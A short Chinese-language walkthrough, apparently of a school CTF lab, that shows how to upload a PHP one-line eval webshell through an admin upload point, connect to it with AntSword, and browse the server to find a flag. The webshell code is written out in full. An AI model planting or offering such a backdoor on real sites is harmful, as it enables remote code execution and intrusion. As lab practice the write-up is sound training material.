获取网站权限
首先获得需操作网址(下面演示的是学校练习靶机)
打开网址,利用上篇所讲知识得到后台管理员权限,登入后台管理
随机寻找可注入点,找到注入点根目录位置
如图,这个就是随机找到的可植入木马位置
先写好一个木马文件,即一句话木马
<?php @eval($_POST['shell']);?>
将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo();,或者用蚁剑或菜刀等工具连接(我这里用的是蚁剑):
然后上传至可植入位置,如下图
提交成功则显示下图,并从首页找到文件发布位置,复制文件绝对路径并访问
打开显示空白即植入成功
打开蚁剑,添加数据并测试链接
连接成功后即添加并打开
观察图得知文件名有以“/”开头,所以此为linux系统文件,打开“/”文件寻找flog
打开这个文件
分析代码可知flag在/home/$user路径底下,返回路径寻找对应路径
打开此flag文件
成功找到flag。
获取权限成功!